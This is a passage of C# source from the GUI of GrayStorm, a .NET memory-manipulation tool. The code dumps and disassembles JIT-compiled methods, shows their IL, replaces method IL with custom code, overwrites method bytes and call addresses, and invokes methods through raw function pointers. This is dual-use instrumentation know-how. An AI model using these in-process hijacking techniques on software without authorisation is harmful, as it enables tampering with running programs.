/// <summary>Raised when a constructor node is selected; wired in loadhierarchyViewer().</summary>
public event targetConstructor selectedConstructor;
21 |
/// <summary>
/// Designer control setup only; event wiring and the initial tree build happen in
/// loadhierarchyViewer().
/// </summary>
public hierarchyViewer()
{
    InitializeComponent();
}
26 |
/// <summary>
/// Records the selected method for the other tabs and shows "Class.Method" in the
/// main window; any previously displayed method address is cleared.
/// </summary>
void hierarchyViewer_selectedMethod(MethodInfo targetMethod, TreeNode TN)
{
    domainTraverser.currentMethod = targetMethod;

    string ownerText = TN.Parent.Text;
    string label = string.Concat(ownerText, ".", targetMethod.Name);
    grayStorm._methodLabel_TB.Text = label;

    grayStorm._addrOfMethod_TB.Text = string.Empty;
}
33 |
/// <summary>
/// Records the selected constructor, shows "Class.ctor" in the main window, forces
/// the runtime to compile the constructor and displays its native entry point in hex.
/// </summary>
void hierarchyViewer_selectedConstructor(ConstructorInfo targetConstructor, TreeNode TN)
{
    domainTraverser.currentConstructor = targetConstructor;
    grayStorm._constructorLabel_TB.Text = string.Concat(TN.Parent.Text, ".", TN.Text);

    // PrepareMethod makes the runtime JIT-compile the constructor so that a
    // native entry point exists before it is read below.
    RuntimeMethodHandle handle = targetConstructor.MethodHandle;
    System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(handle);
    IntPtr nativeEntry = handle.GetFunctionPointer();
    grayStorm._addrOfConstructor_TB.Text = nativeEntry.ToString("X");
}
41 |
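/// <summary>
/// Throws away every cached node-to-reflection mapping and rebuilds the assembly
/// tree from the current AppDomain.
/// </summary>
private void refreshDomain_BT_Click(object sender, EventArgs e)
{
    domainAssemblies.Clear();
    domainClasses.Clear();
    methods.Clear();
    constructors.Clear();
    // Also forget which assembly nodes were already expanded; the old nodes are
    // discarded below, so keeping them here only leaked stale TreeNodes.
    assembliesCreated.Clear();
    hierarchyViewer_TN.Nodes.Clear();
    buildTree();
}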
51 |
52 | #endregion events
53 |
54 | #region init
/// <summary>
/// Hooks the selection events to the handlers that update the main window, then
/// populates the tree with the assemblies currently loaded. Meant to be called once;
/// every call subscribes the handlers again.
/// </summary>
public void loadhierarchyViewer()
{
    this.selectedMethod += new targetMethod(this.hierarchyViewer_selectedMethod);
    this.selectedConstructor += new targetConstructor(this.hierarchyViewer_selectedConstructor);
    this.buildTree();
}
61 | #endregion init
62 |
63 | #region treeNode
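// Node-to-reflection maps that drive hierarchyViewer_TN_AfterSelect. Type arguments
// restored from how each map is used (keys are the TreeNodes created in buildTree /
// makeMethodandFunctionList, values are what those methods store).
System.Collections.Generic.Dictionary<TreeNode, Assembly> domainAssemblies = new Dictionary<TreeNode, Assembly>();
System.Collections.Generic.Dictionary<TreeNode, Type> domainClasses = new Dictionary<TreeNode, Type>();
System.Collections.Generic.Dictionary<TreeNode, MethodInfo> methods = new Dictionary<TreeNode, MethodInfo>();
System.Collections.Generic.Dictionary<TreeNode, ConstructorInfo> constructors = new Dictionary<TreeNode, ConstructorInfo>();
// Assembly nodes whose types have already been added as child nodes.
System.Collections.ArrayList assembliesCreated = new System.Collections.ArrayList();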
69 |
/// <summary>
/// Adds one root node per assembly loaded in the current AppDomain and remembers
/// the node as the key for resolving a later selection. Child nodes (types, members)
/// are added lazily when an assembly node is selected.
/// </summary>
public void buildTree()
{
    Assembly[] loaded = AppDomain.CurrentDomain.GetAssemblies();

    for (int i = 0; i < loaded.Length; i++)
    {
        Assembly asm = loaded[i];
        TreeNode root = new TreeNode(asm.FullName);
        domainAssemblies.Add(root, asm);
        hierarchyViewer_TN.Nodes.Add(root);
    }

    hierarchyViewer_TN.Sort();
}
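/// <summary>
/// Dispatches on what kind of node was selected: an assembly node is expanded with
/// its types on first selection; a method or constructor node raises the matching
/// selection event (and, for constructors, records the owning assembly and type in
/// domainTraverser).
/// </summary>
private void hierarchyViewer_TN_AfterSelect(object sender, TreeViewEventArgs e)
{
    TreeNode theSelectedNode = hierarchyViewer_TN.SelectedNode;
    if (theSelectedNode == null)
        return;

    Assembly assemblySelected;
    MethodInfo methodSelected;
    ConstructorInfo constructorSelected;

    if (domainAssemblies.TryGetValue(theSelectedNode, out assemblySelected))
    {
        if (!assembliesCreated.Contains(theSelectedNode))
            expandAssemblyNode(theSelectedNode, assemblySelected);
    }
    else if (methods.TryGetValue(theSelectedNode, out methodSelected))
    {
        if (selectedMethod != null && methodSelected != null)
            selectedMethod(methodSelected, theSelectedNode);
    }
    else if (constructors.TryGetValue(theSelectedNode, out constructorSelected))
    {
        // Constructor nodes hang under a class node, which hangs under an assembly
        // node; both were registered when the assembly node was expanded.
        TreeNode classNode = theSelectedNode.Parent;
        Assembly owner;
        Type ownerType;

        if (classNode != null && classNode.Parent != null && domainAssemblies.TryGetValue(classNode.Parent, out owner))
            domainTraverser.assemblyInfo = owner;

        // Use the Type stored for the class node rather than re-resolving it from the
        // node text: Type.ToString() is not always a name Assembly.GetType() accepts
        // (generic definitions, for instance), which previously yielded null here.
        if (classNode != null && domainClasses.TryGetValue(classNode, out ownerType))
            domainTraverser.typeInfo = ownerType;

        if (selectedConstructor != null && constructorSelected != null)
            selectedConstructor(constructorSelected, theSelectedNode);
    }
}

/// <summary>
/// Adds one child node per type of <paramref name="assemblySelected"/> under
/// <paramref name="assemblyNode"/>, filling in each type's members, and marks the node
/// as expanded. Types that fail to load are skipped instead of aborting the expansion.
/// </summary>
private void expandAssemblyNode(TreeNode assemblyNode, Assembly assemblySelected)
{
    Type[] types;
    try
    {
        types = assemblySelected.GetTypes();
    }
    catch (ReflectionTypeLoadException ex)
    {
        // Partial failure: ex.Types holds the types that did load, with null
        // placeholders for those that did not.
        types = ex.Types;
    }

    foreach (Type type in types)
    {
        if (type == null)
            continue;
        TreeNode asmClass = new TreeNode(type.ToString());
        makeMethodandFunctionList(asmClass, type);
        domainClasses.Add(asmClass, type);
        assemblyNode.Nodes.Add(asmClass);
    }

    assembliesCreated.Add(assemblyNode);
    hierarchyViewer_TN.Sort();
}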
125 |
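/// <summary>
/// Adds one child node per declared method and per constructor of
/// <paramref name="classSelected"/> under <paramref name="parent"/>, registering each
/// node in the methods / constructors maps. If member enumeration fails, a placeholder
/// node is added so the failure is visible rather than silently dropped.
/// </summary>
private void makeMethodandFunctionList(TreeNode parent, Type classSelected)
{
    try
    {
        MethodInfo[] methodInfo = classSelected.GetMethods(BindingFlags.NonPublic | BindingFlags.Static | BindingFlags.Instance | BindingFlags.Public | BindingFlags.DeclaredOnly);
        ConstructorInfo[] constructorList = classSelected.GetConstructors(BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic);

        foreach (MethodInfo classMethod in methodInfo)
        {
            TreeNode asmMethod = new TreeNode(classMethod.ToString());
            parent.Nodes.Add(asmMethod);
            methods.Add(asmMethod, classMethod);
        }

        foreach (ConstructorInfo constructorInfo in constructorList)
        {
            TreeNode asmCtor = new TreeNode(constructorInfo.ToString());
            parent.Nodes.Add(asmCtor);
            constructors.Add(asmCtor, constructorInfo);
        }
    }
    catch (Exception ex)
    {
        // Reflection over some types throws (e.g. when a dependency cannot be
        // resolved). The placeholder is not in any map, so selecting it is a no-op.
        parent.Nodes.Add(new TreeNode("<members unavailable: " + ex.GetType().Name + ">"));
    }
}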
150 | #endregion treeNode
151 |
152 | #region rightClickMenu
153 |
/// <summary>
/// Context-menu action: shows the selected method's code as raw bytes by clearing the
/// memory hijacker's disassemble checkbox and running its dump.
/// </summary>
private void dumpToolStripMenuItem_Click(object sender, EventArgs e)
{
    var hijacker = grayStorm._memoryHijacker;
    hijacker.setDisassembleUnchecked();
    hijacker.dumpAsm_BT_Click(null, null);
}
159 |
/// <summary>
/// Context-menu action: shows the selected method's code as disassembly by setting the
/// memory hijacker's disassemble checkbox and running its dump.
/// </summary>
private void disassembleToolStripMenuItem_Click(object sender, EventArgs e)
{
    var hijacker = grayStorm._memoryHijacker;
    hijacker.setDisassembleChecked();
    hijacker.dumpAsm_BT_Click(null, null);
}
165 |
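/// <summary>
/// Context-menu action: forces the selected method's code to be read from memory again by clearing
/// the dumped flag on its cache entry and re-running the dump. Does nothing when the method is not cached.
/// </summary>
private void reDumpToolStripMenuItem_Click(object sender, EventArgs e)
{
    int containedIndex = getContainedIndex();
    // Index 0 is a valid cache slot; the previous "> 0" test silently skipped the first cached method.
    if (containedIndex < 0)
        return;
    methodHelpers.StorageInformationArrayList[containedIndex].dumped = false;
    grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
}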
175 |
/// <summary>
/// Context-menu action: writes the bytes saved when the selected method was first dumped
/// (StorageInformation.oldMethod) back over its code and marks the cache entry as needing a fresh dump.
/// Does nothing when the method is not cached.
/// </summary>
private void restoreMethodToolStripMenuItem_Click(object sender, EventArgs e)
{
    int containedIndex = getContainedIndex();
    if (containedIndex == -1)
        return;
    try
    {
        // methodHijacking.writeAMethod appears to take its source bytes from the shared
        // assemblyHelpers.holder field (every caller in this project assigns holder right before the
        // call), so the assignment order here matters.
        GrayStorm.assemblyHelpers.holder = methodHelpers.StorageInformationArrayList[containedIndex].oldMethod;
        methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
        methodHelpers.StorageInformationArrayList[containedIndex].dumped = false;
    }
    catch { }   // NOTE(review): a failed restore is swallowed; the user gets no indication that the original bytes are not back
}
189 |
/// <summary>Context-menu action: lists the IL of the selected method via the memory hijacker's "Get IL Code" button handler.</summary>
private void showILCodeToolStripMenuItem_Click(object sender, EventArgs e)
{
    grayStorm._memoryHijacker.getIL_BT_Click(null, null);
}
194 |
/// <summary>
/// Context-menu action: replaces the IL of the currently selected method with that of the custom C#
/// method selected in the memory hijacker's dynamicMethods_LB, announcing it in a message box first.
/// Does nothing unless both a replacement and a current method are selected.
/// </summary>
private void replaceMethodWithCustomCToolStripMenuItem_Click(object sender, EventArgs e)
{
    MethodInfo replacement = grayStorm._memoryHijacker.dynamicMethods_LB.SelectedItem as MethodInfo;
    bool canReplace = replacement != null && domainTraverser.currentMethod != null;
    if (canReplace)
    {
        System.Windows.Forms.MessageBox.Show("Replacing with " + replacement.Name);
        dynamic_C.methodReplacer.replaceIL(domainTraverser.currentMethod, replacement);
    }
}
203 |
// Index into methodHelpers.StorageInformationArrayList chosen via the "cache replacer method" action;
// -1 means none. Read by memoryHijacker's "Change Call Address from Cached Method" handlers.
public static int savedCachePtr = -1;
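/// <summary>
/// Context-menu action: remembers the cache index of the currently selected method in savedCachePtr
/// for later use by the memory hijacker's "Change Call Address from Cached Method" items. The method is
/// dumped first when it is not cached yet; savedCachePtr becomes -1 if it still cannot be found.
/// </summary>
private void cacheReplacerMethodToolStripMenuItem_Click(object sender, EventArgs e)
{
    int containedIndex = getContainedIndex();
    if (containedIndex == -1)
    {
        grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
        // Re-query through getContainedIndex, as the other handlers do, so a null currentMethod yields
        // -1 instead of being handed to methodHelpers.containedInList directly.
        containedIndex = getContainedIndex();
    }
    savedCachePtr = containedIndex;
}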
215 |
/// <summary>
/// Returns the index of domainTraverser.currentMethod in methodHelpers.StorageInformationArrayList,
/// or -1 when no method is selected (containedInList itself reports -1 for uncached methods).
/// </summary>
private int getContainedIndex()
{
    var current = domainTraverser.currentMethod;
    return current == null ? -1 : methodHelpers.containedInList(current);
}
222 |
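/// <summary>
/// Context-menu action: invokes the currently selected method through its cached function pointer
/// (methodInvoking.fireMethod with mode 0; the withINT3 variant passes 1 — the flag's meaning lives in
/// methodInvoking, not here). The method is dumped first when it is not cached; if that still yields
/// no cache entry (nothing selected, or its memory could not be read) nothing is invoked.
/// </summary>
private void normalToolStripMenuItem_Click(object sender, EventArgs e)
{
    int containedIndex = getContainedIndex();
    if (containedIndex < 0)
    {
        // Populate the cache, then re-check instead of recursing: the previous self-call never
        // terminated when dumpAsm_BT_Click returned without adding an entry (stack overflow).
        grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
        containedIndex = getContainedIndex();
        if (containedIndex < 0)
            return;
    }
    methodInvoking.fireMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr, 0);
}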
236 |
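/// <summary>
/// Context-menu action: invokes the currently selected method through its cached function pointer
/// with methodInvoking.fireMethod mode 1 (the "normal" variant passes 0; the flag's meaning lives in
/// methodInvoking, not here). The method is dumped first when it is not cached; if that still yields
/// no cache entry (nothing selected, or its memory could not be read) nothing is invoked.
/// </summary>
private void withINT3ToolStripMenuItem_Click(object sender, EventArgs e)
{
    int containedIndex = getContainedIndex();
    if (containedIndex < 0)
    {
        // Populate the cache, then re-check instead of recursing: the previous self-call never
        // terminated when dumpAsm_BT_Click returned without adding an entry (stack overflow).
        grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
        containedIndex = getContainedIndex();
        if (containedIndex < 0)
            return;
    }
    methodInvoking.fireMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr, 1);
}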
250 |
251 | #endregion rightClickMenu
252 | }
253 | }
--------------------------------------------------------------------------------
/GUI/hierarchyViewer.resx:
--------------------------------------------------------------------------------
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | 17, 17
122 |
123 |
--------------------------------------------------------------------------------
/GUI/memoryHijacker.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace GrayStorm
2 | {
/// <summary>
/// Designer-generated half of the memoryHijacker control: creates the editor text box, the two
/// context menus, the buttons, the disassemble checkbox and the dynamic-methods list box and wires
/// their Click handlers. All behaviour lives in memoryHijacker.cs.
/// </summary>
partial class memoryHijacker
{
    /// <summary>
    /// Required designer variable.
    /// </summary>
    private System.ComponentModel.IContainer components = null;

    /// <summary>
    /// Clean up any resources being used.
    /// </summary>
    /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
    protected override void Dispose(bool disposing)
    {
        if (disposing && (components != null))
        {
            components.Dispose();
        }
        base.Dispose(disposing);
    }

    #region Component Designer generated code

    /// <summary>
    /// Required method for Designer support - do not modify
    /// the contents of this method with the code editor.
    /// </summary>
    private void InitializeComponent()
    {
        this.components = new System.ComponentModel.Container();
        this.editor_RTB = new System.Windows.Forms.RichTextBox();
        this.assmblyControlFlow = new System.Windows.Forms.ContextMenuStrip(this.components);
        this.changeCallAddressFromCuscomC0xFFToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.changeCallAddressFromSelectedMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.dumpAsm_BT = new System.Windows.Forms.Button();
        this.getIL_BT = new System.Windows.Forms.Button();
        this.disassemble_CB = new System.Windows.Forms.CheckBox();
        this.splitContainer1 = new System.Windows.Forms.SplitContainer();
        this.dynamicMethods_LB = new System.Windows.Forms.ListBox();
        this.dynamicControl = new System.Windows.Forms.ContextMenuStrip(this.components);
        this.fireMethodToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.replaceMethodWithCustomCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.getILCustomCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.dumpAssemblyCustomCToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
        this.assmblyControlFlow.SuspendLayout();
        this.splitContainer1.Panel1.SuspendLayout();
        this.splitContainer1.Panel2.SuspendLayout();
        this.splitContainer1.SuspendLayout();
        this.dynamicControl.SuspendLayout();
        this.SuspendLayout();
        //
        // editor_RTB — output area for dumps, disassembly and IL; right-click menu is assmblyControlFlow
        //
        this.editor_RTB.ContextMenuStrip = this.assmblyControlFlow;
        this.editor_RTB.Dock = System.Windows.Forms.DockStyle.Fill;
        this.editor_RTB.Location = new System.Drawing.Point(0, 0);
        this.editor_RTB.Name = "editor_RTB";
        this.editor_RTB.Size = new System.Drawing.Size(356, 391);
        this.editor_RTB.TabIndex = 0;
        this.editor_RTB.Text = "";
        //
        // assmblyControlFlow
        //
        this.assmblyControlFlow.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
        this.changeCallAddressFromCuscomC0xFFToolStripMenuItem,
        this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem,
        this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem,
        this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem,
        this.changeCallAddressFromSelectedMethodToolStripMenuItem});
        this.assmblyControlFlow.Name = "contextMenuStrip2";
        this.assmblyControlFlow.Size = new System.Drawing.Size(339, 114);
        //
        // changeCallAddressFromCuscomC0xFFToolStripMenuItem
        // ("Cuscom" is a typo for "Custom" in the user-visible text; designer strings are left as generated)
        //
        this.changeCallAddressFromCuscomC0xFFToolStripMenuItem.Name = "changeCallAddressFromCuscomC0xFFToolStripMenuItem";
        this.changeCallAddressFromCuscomC0xFFToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
        this.changeCallAddressFromCuscomC0xFFToolStripMenuItem.Text = "Change Call Address From Cuscom C# (0xFF)";
        this.changeCallAddressFromCuscomC0xFFToolStripMenuItem.Click += new System.EventHandler(this.changeCallAddressFromCuscomC0xFFToolStripMenuItem_Click);
        //
        // changeCallAddressFromCuscomC0xE8ToolStripMenuItem
        //
        this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem.Name = "changeCallAddressFromCuscomC0xE8ToolStripMenuItem";
        this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
        this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem.Text = "Change Call Address From Cuscom C# (0xE8)";
        this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem.Click += new System.EventHandler(this.changeCallAddressFromCuscomC0xE8ToolStripMenuItem_Click);
        //
        // changeCallAddressFromCachedMethod0xFFToolStripMenuItem
        //
        this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem.Name = "changeCallAddressFromCachedMethod0xFFToolStripMenuItem";
        this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
        this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem.Text = "Change Call Address from Cached Method (0xFF))";
        this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem.Click += new System.EventHandler(this.changeCallAddressFromCachedMethod0xFFToolStripMenuItem_Click);
        //
        // changeCallAddressFromCachedMethod0xE8ToolStripMenuItem
        //
        this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem.Name = "changeCallAddressFromCachedMethod0xE8ToolStripMenuItem";
        this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
        this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem.Text = "Change Call Address from Cached Method (0xE8)";
        this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem.Click += new System.EventHandler(this.changeCallAddressFromCachedMethod0xE8ToolStripMenuItem_Click);
        //
        // changeCallAddressFromSelectedMethodToolStripMenuItem
        // NOTE(review): neither Text nor a Click handler is assigned here, so this item shows an empty
        // caption and does nothing when clicked (unless wired elsewhere — not visible in this file).
        //
        this.changeCallAddressFromSelectedMethodToolStripMenuItem.Name = "changeCallAddressFromSelectedMethodToolStripMenuItem";
        this.changeCallAddressFromSelectedMethodToolStripMenuItem.Size = new System.Drawing.Size(338, 22);
        //
        // dumpAsm_BT
        //
        this.dumpAsm_BT.Location = new System.Drawing.Point(3, 28);
        this.dumpAsm_BT.Name = "dumpAsm_BT";
        this.dumpAsm_BT.Size = new System.Drawing.Size(177, 38);
        this.dumpAsm_BT.TabIndex = 1;
        this.dumpAsm_BT.Text = "Dump Assembly";
        this.dumpAsm_BT.UseVisualStyleBackColor = true;
        this.dumpAsm_BT.Click += new System.EventHandler(this.dumpAsm_BT_Click);
        //
        // getIL_BT
        //
        this.getIL_BT.Location = new System.Drawing.Point(3, 95);
        this.getIL_BT.Name = "getIL_BT";
        this.getIL_BT.Size = new System.Drawing.Size(172, 32);
        this.getIL_BT.TabIndex = 2;
        this.getIL_BT.Text = "Get IL Code";
        this.getIL_BT.UseVisualStyleBackColor = true;
        this.getIL_BT.Click += new System.EventHandler(this.getIL_BT_Click);
        //
        // disassemble_CB — toggled programmatically by hierarchyViewer through setDisassembleChecked/Unchecked
        //
        this.disassemble_CB.AutoSize = true;
        this.disassemble_CB.Location = new System.Drawing.Point(3, 72);
        this.disassemble_CB.Name = "disassemble_CB";
        this.disassemble_CB.Size = new System.Drawing.Size(83, 17);
        this.disassemble_CB.TabIndex = 3;
        this.disassemble_CB.Text = "disassemble";
        this.disassemble_CB.UseVisualStyleBackColor = true;
        //
        // splitContainer1
        //
        this.splitContainer1.Dock = System.Windows.Forms.DockStyle.Fill;
        this.splitContainer1.Location = new System.Drawing.Point(0, 0);
        this.splitContainer1.Name = "splitContainer1";
        //
        // splitContainer1.Panel1
        //
        this.splitContainer1.Panel1.Controls.Add(this.dynamicMethods_LB);
        this.splitContainer1.Panel1.Controls.Add(this.getIL_BT);
        this.splitContainer1.Panel1.Controls.Add(this.disassemble_CB);
        this.splitContainer1.Panel1.Controls.Add(this.dumpAsm_BT);
        //
        // splitContainer1.Panel2
        //
        this.splitContainer1.Panel2.Controls.Add(this.editor_RTB);
        this.splitContainer1.Size = new System.Drawing.Size(540, 391);
        this.splitContainer1.SplitterDistance = 180;
        this.splitContainer1.TabIndex = 5;
        //
        // dynamicMethods_LB — list of user-written methods; right-click menu is dynamicControl
        //
        this.dynamicMethods_LB.ContextMenuStrip = this.dynamicControl;
        this.dynamicMethods_LB.FormattingEnabled = true;
        this.dynamicMethods_LB.Location = new System.Drawing.Point(3, 230);
        this.dynamicMethods_LB.Name = "dynamicMethods_LB";
        this.dynamicMethods_LB.Size = new System.Drawing.Size(172, 147);
        this.dynamicMethods_LB.TabIndex = 5;
        //
        // dynamicControl
        //
        this.dynamicControl.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
        this.fireMethodToolStripMenuItem,
        this.replaceMethodWithCustomCToolStripMenuItem,
        this.getILCustomCToolStripMenuItem,
        this.dumpAssemblyCustomCToolStripMenuItem});
        this.dynamicControl.Name = "contextMenuStrip1";
        this.dynamicControl.Size = new System.Drawing.Size(250, 92);
        //
        // fireMethodToolStripMenuItem
        //
        this.fireMethodToolStripMenuItem.Name = "fireMethodToolStripMenuItem";
        this.fireMethodToolStripMenuItem.Size = new System.Drawing.Size(249, 22);
        this.fireMethodToolStripMenuItem.Text = "Fire Method";
        this.fireMethodToolStripMenuItem.Click += new System.EventHandler(this.fireMethodToolStripMenuItem_Click);
        //
        // replaceMethodWithCustomCToolStripMenuItem
        // NOTE(review): no Click handler is wired here; hierarchyViewer has a handler of the same name
        // for its own menu, so whether this item does anything depends on wiring not visible in this file.
        //
        this.replaceMethodWithCustomCToolStripMenuItem.Name = "replaceMethodWithCustomCToolStripMenuItem";
        this.replaceMethodWithCustomCToolStripMenuItem.Size = new System.Drawing.Size(249, 22);
        this.replaceMethodWithCustomCToolStripMenuItem.Text = "Replace Method with Custom C#";
        //
        // getILCustomCToolStripMenuItem
        //
        this.getILCustomCToolStripMenuItem.Name = "getILCustomCToolStripMenuItem";
        this.getILCustomCToolStripMenuItem.Size = new System.Drawing.Size(249, 22);
        this.getILCustomCToolStripMenuItem.Text = "Get IL Custom C#";
        this.getILCustomCToolStripMenuItem.Click += new System.EventHandler(this.getILCustomCToolStripMenuItem_Click);
        //
        // dumpAssemblyCustomCToolStripMenuItem
        //
        this.dumpAssemblyCustomCToolStripMenuItem.Name = "dumpAssemblyCustomCToolStripMenuItem";
        this.dumpAssemblyCustomCToolStripMenuItem.Size = new System.Drawing.Size(249, 22);
        this.dumpAssemblyCustomCToolStripMenuItem.Text = "Dump Assembly Custom C#";
        this.dumpAssemblyCustomCToolStripMenuItem.Click += new System.EventHandler(this.dumpAssemblyCustomCToolStripMenuItem_Click);
        //
        // memoryHijacker
        //
        this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
        this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
        this.Controls.Add(this.splitContainer1);
        this.Name = "memoryHijacker";
        this.Size = new System.Drawing.Size(540, 391);
        this.assmblyControlFlow.ResumeLayout(false);
        this.splitContainer1.Panel1.ResumeLayout(false);
        this.splitContainer1.Panel1.PerformLayout();
        this.splitContainer1.Panel2.ResumeLayout(false);
        this.splitContainer1.ResumeLayout(false);
        this.dynamicControl.ResumeLayout(false);
        this.ResumeLayout(false);

    }

    #endregion

    // Public members are reached from other controls (hierarchyViewer reads dynamicMethods_LB and
    // toggles disassemble_CB through the helper methods in memoryHijacker.cs).
    public System.Windows.Forms.RichTextBox editor_RTB;
    private System.Windows.Forms.Button dumpAsm_BT;
    private System.Windows.Forms.Button getIL_BT;
    public System.Windows.Forms.CheckBox disassemble_CB;
    private System.Windows.Forms.SplitContainer splitContainer1;
    public System.Windows.Forms.ListBox dynamicMethods_LB;
    private System.Windows.Forms.ContextMenuStrip dynamicControl;
    private System.Windows.Forms.ToolStripMenuItem fireMethodToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem replaceMethodWithCustomCToolStripMenuItem;
    private System.Windows.Forms.ContextMenuStrip assmblyControlFlow;
    private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromCuscomC0xFFToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromCuscomC0xE8ToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromCachedMethod0xFFToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromCachedMethod0xE8ToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem changeCallAddressFromSelectedMethodToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem getILCustomCToolStripMenuItem;
    private System.Windows.Forms.ToolStripMenuItem dumpAssemblyCustomCToolStripMenuItem;
}
243 | }
244 |
--------------------------------------------------------------------------------
/GUI/memoryHijacker.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Drawing;
5 | using System.Data;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Windows.Forms;
9 | using System.Reflection;
10 |
11 | namespace GrayStorm
12 | {
/// <summary>
/// Control that shows the native code (raw bytes or beaEngine disassembly) and the IL of the method
/// currently selected in the hierarchy viewer (domainTraverser.currentMethod), and of the user-written
/// methods listed in dynamicMethods_LB. Dumped methods are cached in
/// methodHelpers.StorageInformationArrayList, which the hierarchyViewer and shellcode controls also use.
/// </summary>
public partial class memoryHijacker : UserControl
{
    public memoryHijacker()
    {
        InitializeComponent();

    }
    // Cache entry created by dumpAsm_BT_Click the first time a method is dumped.
    public StorageInformation currentMethod;

    #region buttons

    /// <summary>
    /// Dumps the JIT-compiled code of domainTraverser.currentMethod into editor_RTB: one "0xNN" line per
    /// byte, or beaEngine disassembly when disassemble_CB is checked. On the first dump of a method it is
    /// JIT-prepared, its function pointer and bytes are recorded in methodHelpers.StorageInformationArrayList
    /// and the pointer is shown in grayStorm._addrOfMethod_TB; later dumps reuse the cached bytes unless the
    /// entry's dumped flag has been reset, in which case the bytes are read again.
    /// </summary>
    /// <param name="sender">Unused; menu handlers in other controls also call this directly with (null, null).</param>
    /// <param name="e">Unused.</param>
    public void dumpAsm_BT_Click(object sender, EventArgs e)
    {
        editor_RTB.Clear();
        IntPtr trueIntPtr = IntPtr.Zero;
        Delegate targetMethodDelegate = null;

        // Methods whose name contains "Dispose" are never dumped; the reason is not stated anywhere visible — TODO confirm.
        if (domainTraverser.currentMethod == null || domainTraverser.currentMethod.Name.Contains("Dispose"))
            return;
        int containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
        if (containedIndex == -1 || methodHelpers.StorageInformationArrayList[containedIndex].dumped != true)
        {
            byte[] memory;
            if (containedIndex != -1)
            {
                // Cached method whose dumped flag was reset: re-read its current bytes. oldMethod is
                // deliberately left untouched so a later restore still writes back the first-dump bytes.
                memory = assemblyHelpers.DumpAFunction(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
                grayStorm._addrOfMethod_TB.Text = methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr.ToString("X");
                if (memory == null)
                {
                    editor_RTB.AppendText(String.Format("COULD NOT READ MEMORY\n"));
                    return;
                }
                else
                {
                    methodHelpers.StorageInformationArrayList[containedIndex].memory = memory;
                    methodHelpers.StorageInformationArrayList[containedIndex].dumped = true;
                }
            }
            else
            {
                // First dump of this method.
                methodInvoking invokeMethods = new methodInvoking();
                System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(domainTraverser.currentMethod.MethodHandle); //JIT the method!
                grayStorm._addrOfMethod_TB.Text = domainTraverser.currentMethod.MethodHandle.GetFunctionPointer().ToString("X");
                targetMethodDelegate = invokeMethods.getMethodDelegate(domainTraverser.currentMethod); //Get the Delegate of the method.
                // The address that is actually read and cached is the one derived from the delegate; the
                // MethodHandle pointer shown above is overwritten in the text box once the entry exists.
                trueIntPtr = invokeMethods.getIntPtrFromDelegate(targetMethodDelegate);
                memory = assemblyHelpers.DumpAFunction(trueIntPtr);
                if (memory == null)
                {
                    editor_RTB.AppendText(String.Format("COULD NOT READ MEMORY\n"));
                    return;
                }
                else
                {
